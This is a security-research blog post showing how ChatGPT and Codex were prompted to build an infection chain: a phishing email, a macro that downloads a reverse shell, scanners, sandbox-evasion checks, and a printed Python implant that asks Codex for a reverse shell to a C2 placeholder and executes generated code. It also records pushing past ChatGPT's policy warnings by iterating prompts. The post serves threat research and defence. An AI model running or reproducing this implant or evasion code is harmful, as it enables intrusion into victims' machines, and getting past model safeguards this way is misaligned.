
OpwnAI: AI That Can Save the Day or HACK it Away

December 19, 2022

Research by: Sharon Ben-Moshe, Gil Gekker, Golan Cohen

Introduction

Following OpenAI's release of ChatGPT, the new interface for its Large Language Model (LLM), the last few weeks have seen an explosion of interest in general AI in the media and on social networks. The model is used in many applications all over the web and has been praised for its ability to generate well-written code and aid the development process. However, this new technology also brings risks. For instance, by lowering the bar for code generation, it can help less-skilled threat actors effortlessly launch cyber-attacks.

In this article, Check Point Research demonstrates:

  • How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell
  • How researchers created an additional backdoor that dynamically runs scripts that the AI generates on the fly
  • Examples of the positive impact of OpenAI on the defenders' side and how it can help researchers in their day-to-day work

The world of cybersecurity is rapidly changing. It is critical to remain vigilant about how this new and developing technology can affect the threat landscape, for both good and bad. While this new technology helps defenders, it also lowers the entry bar for low-skilled threat actors to run phishing campaigns and develop malware.

Background

From image generation to writing code, AI models have made tremendous progress in multiple fields: the famous AlphaGo software beat the top professionals at the game of Go in 2016, and improved speech recognition and machine translation brought the world virtual assistants such as Siri and Alexa, which play a major role in our daily lives.
Recently, public interest in AI spiked due to the release of ChatGPT, a prototype chatbot whose “purpose is to assist with a wide range of tasks and answer questions to the best of my ability.” Unless you’ve been disconnected from social media for the last few weeks, you’ve most likely seen countless images of ChatGPT interactions, from writing poetry to answering programming questions.
However, like any technology, ChatGPT’s increased popularity also carries increased risk. For example, Twitter is replete with examples of malicious code or dialogues generated by ChatGPT. Although OpenAI has invested tremendous effort into stopping abuse of its AI, it can still be used to produce dangerous code.
To illustrate this point, we decided to use ChatGPT and another platform, OpenAI’s Codex, an AI-based system that translates natural language to code, most capable in Python but proficient in other languages. We created a full infection flow and gave ourselves the following restriction: We did not write a single line of code and instead let the AIs do all the work. We only put together the pieces of the puzzle and executed the resulting attack.
We chose to illustrate our point with a single execution flow: a phishing email with a malicious Excel file weaponized with macros that downloads a reverse shell (one of the favorites among cybercrime actors).

ChatGPT: The Talented Phisher

In the first step, we created a plausible phishing email. This cannot be done with Codex, which only generates code, so we asked ChatGPT to assist and suggested that it impersonate a hosting company.

Figure 1 – Basic phishing email generated by ChatGPT

Note that while OpenAI mentions that this content might violate its content policy, its output provides a great start. In further interaction with ChatGPT, we can clarify our requirements: to avoid hosting additional phishing infrastructure, we want the target to simply download an Excel document. Simply asking ChatGPT to iterate again produces an excellent phishing email:

Figure 2 – Phishing email generated by ChatGPT

Iteration is essential when working with the model, especially for code. The next step, creating the malicious VBA code for the Excel document, also requires multiple iterations.

This is the first prompt:

Figure 3 – Simple VBA code generated by ChatGPT

This code is very naive and uses libraries such as WinHttpReq. However, after some short back-and-forth iteration, ChatGPT produces better code:

Figure 4 – Another version of the VBA code

This is still a very basic macro, but we decided to stop here, as obfuscating and refining VBA code can be a never-ending procedure. ChatGPT proved that, given good textual prompts, it can produce working malicious code.

Codex – An AI, Or the Future Name of an Implant?

Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is translating natural language to code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code.

We first asked it to create a basic reverse shell for us, using a placeholder IP and port. The prompt is the comment at the beginning of the code block.

Figure 5 – Basic reverse shell generated by Codex

This is a great start, but it would be nice if we had some malicious tools to aid our intrusion. Perhaps some scanning tools, such as one that checks whether a service is vulnerable to SQL injection, and a port scanner?

Figure 6 – The most basic implementation of SQLi generated by Codex
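Since the figure above is an image in the original post, the sketch below is our own hedged reconstruction of the kind of "most basic" check this describes: it appends a single quote to a URL parameter and looks for database error strings leaking into the response. The target URL and the error-marker list are illustrative assumptions, and this is a detection heuristic rather than exploitation code:

import requests

def looks_sqli_vulnerable(url):
  # Hypothetical heuristic: append a single quote and check whether
  # database error messages leak into the response body
  response = requests.get(url + "'")
  error_markers = ["sql syntax", "unclosed quotation mark", "sqlite error"]
  return any(marker in response.text.lower() for marker in error_markers)

# Illustrative target; only test services you are authorized to assess
print(looks_sqli_vulnerable("http://example.com/item?id=1"))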

Figure 7 – Basic port scanning script
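Figure 7 is likewise an image; as a hedged illustration written by us rather than copied from Codex's output, a basic port scanner of this kind typically boils down to a TCP connect loop (the host and port range are placeholders we chose):

import socket

def scan_ports(host, ports):
  open_ports = []
  for port in ports:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(0.5)
      # connect_ex returns 0 when the TCP handshake succeeds
      if s.connect_ex((host, port)) == 0:
        open_ports.append(port)
  return open_ports

print(scan_ports("127.0.0.1", range(1, 1025)))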

This is another good start, but we would like to add some mitigations to make the defenders' lives a little more difficult. Can we detect if our program is running in a sandbox? The basic answer provided by Codex is below. Of course, it can be improved by adding other vendors and additional checks.

Figure 8 – Basic sandbox detection script
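Again, the figure is an image; the minimal sketch below, which we wrote ourselves to convey the flavor of such a script, combines two well-known heuristics: a low CPU-core count and MAC address prefixes registered to common virtualization vendors:

import os
import uuid

# OUI prefixes registered to common hypervisor vendors (VMware, VirtualBox)
VM_MAC_PREFIXES = ("000569", "000c29", "001c14", "005056", "080027")

def likely_sandbox():
  # Analysis VMs are often configured with a single CPU core
  few_cores = (os.cpu_count() or 1) < 2
  # The NIC's MAC address may reveal the hypervisor vendor
  mac = "%012x" % uuid.getnode()
  return few_cores or mac.startswith(VM_MAC_PREFIXES)

print(likely_sandbox())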

We see that we are making progress. However, all of this is standalone Python code. Even if an AI bundles this code together for us (which it can), we can't be sure that the infected machine will have an interpreter. To make it run natively on any Windows machine, the easiest solution is to compile it to an exe. Once again, our AI buddies come through for us:

Figure 9 – Conversion from Python to exe
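The figure shows the AI's answer as an image; in practice the suggestion amounts to PyInstaller. A minimal programmatic invocation, equivalent to running pyinstaller --onefile payload.py on the command line (the script name is a hypothetical choice of ours), looks like this:

import PyInstaller.__main__

# Bundle the script and a Python interpreter into a single standalone
# Windows executable; the resulting .exe lands in .\dist
PyInstaller.__main__.run(["--onefile", "payload.py"])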

And just like that, the infection flow is complete. We created a phishing email with an attached Excel document containing malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs, and all that's left for us is to execute the attack.

No Knowledge in Scripting? Don’t Worry, English is Good Enough

We were curious to see how deep the rabbit hole goes. Creating the initial scripts and modules is nice, but a real cyberattack requires flexibility, as the attackers' needs during an intrusion might change rapidly depending on the infected environment. To see how we can leverage the AI's ability to create code on the fly to answer this dynamic need, we created the following short Python code. After being compiled to a PE, the exe first runs the previously mentioned reverse shell. Afterward, it waits for commands with the -cmd flag and runs Python scripts generated on the fly by querying the Codex API with a simple prompt in English.

import os       # os, socket and winreg are made available to the generated scripts run via exec() below
import sys
import openai
import argparse
import socket
import winreg

openai.api_key = <API_KEY>

parser = argparse.ArgumentParser()
parser.add_argument('-cmd', type=str, help='Prompt that will be run on infected machine')
args = parser.parse_args()

def ExecuteReverseShell():
  # Ask Codex for a reverse shell script and execute whatever code it returns
  response = openai.Completion.create(
    model="code-davinci-002",
    prompt="\"\"\"\nExecute reverse shell script on a windows machine and connect to IP address <C2_IP_Address> port <C2_Port>.\n\"\"\"",
    temperature=0,      # deterministic completions
    max_tokens=1000,
    top_p=1,
    frequency_penalty=0,
    presence_penalty=0
  )
  exec(response.choices[0].text)


def ExecutePrompt(prompts):
  # Wrap the operator's English prompt in a docstring-style comment,
  # then execute the Python code Codex generates for it
  response = openai.Completion.create(
    model="code-davinci-002",
    prompt="\"\"\"\n"+prompts+"\n\"\"\"",
    temperature=0,
    max_tokens=1000,
    top_p=1,
    frequency_penalty=0,
    presence_penalty=0
  )
  exec(response.choices[0].text)


if __name__ == '__main__':
  if len(sys.argv) == 1:  # no arguments: default to the reverse shell
    ExecuteReverseShell()
  if args.cmd:            # -cmd given: run a script generated from the prompt
    ExecutePrompt(args.cmd)

Now that we’ve got a few examples of the execution of the script below, we leave the possible vectors of developing this kind of attack to a curious reader:

Figure 10 – Execution of the code generated on the fly based on input in English
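For context, invoking the compiled binary looks roughly like this (the executable name and the example prompt are our own illustrative choices, not taken from the figure):

# With no arguments, the exe launches the Codex-generated reverse shell:
#   C:\> implant.exe
# With -cmd, an English prompt is turned into Python and run in-process:
#   C:\> implant.exe -cmd "Print the hostname and current user of this machine"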

Using Codex to Augment Defenders

Up to this point, we have presented the threat actor's perspective on using LLMs. To be clear, the technology itself isn't malevolent and can be used by any party. As attack processes can be automated, so can mitigations on the defenders' side.

To illustrate this, we asked Codex to write two simple Python functions: one that searches for URLs inside files using the YARA package, and another that queries VirusTotal for the number of detections of a specific hash. Even though better open-source implementations of these scripts exist, written by the defender community, we hope to spark the imagination of blue teamers and threat hunters to use the new LLMs to automate and improve their work.

Figure 11 – VT API Query to check number of detections for a hash
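The figure is an image in the original post; the sketch below is our hedged reconstruction of such a function against VirusTotal's public v3 REST API (the API key and file hash are placeholders):

import requests

VT_API_KEY = "<VT_API_KEY>"  # placeholder

def detections_for_hash(file_hash):
  # VirusTotal API v3: GET /files/{hash} returns per-engine verdict counts
  url = "https://www.virustotal.com/api/v3/files/" + file_hash
  response = requests.get(url, headers={"x-apikey": VT_API_KEY})
  response.raise_for_status()
  stats = response.json()["data"]["attributes"]["last_analysis_stats"]
  return stats["malicious"]

print(detections_for_hash("<FILE_HASH>"))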

Figure 12 – YARA script that checks for URL strings in a file
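Likewise for Figure 12, here is our hedged sketch of such a scanner using the yara-python package, with a single regex rule for http(s) URLs (the rule name and scanned file name are our own choices):

import yara

# One rule matching http/https URLs; 'ascii wide' also covers UTF-16 strings
RULE_SOURCE = r'''
rule url_strings {
  strings:
    $url = /https?:\/\/[\w\.\/\-\?=&%]+/ ascii wide
  condition:
    $url
}
'''

def find_urls(path):
  rules = yara.compile(source=RULE_SOURCE)
  for match in rules.match(path):
    for string_match in match.strings:
      print(string_match)  # offset, identifier, and matched data

find_urls("suspicious_sample.xls")  # hypothetical file name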

Conclusion

The expanding role of LLMs and AI in the cyber world is full of opportunity, but also comes with risks. Although the code and infection flow presented in this article can be defended against with simple procedures, this is just an elementary showcase of the impact of AI research on cybersecurity. Multiple scripts can be generated easily, with slight variations using different wordings. Complicated attack processes can also be automated, using LLM APIs to generate other malicious artifacts. Defenders and threat hunters should be vigilant and cautious about adopting this technology quickly; otherwise, our community will be one step behind the attackers.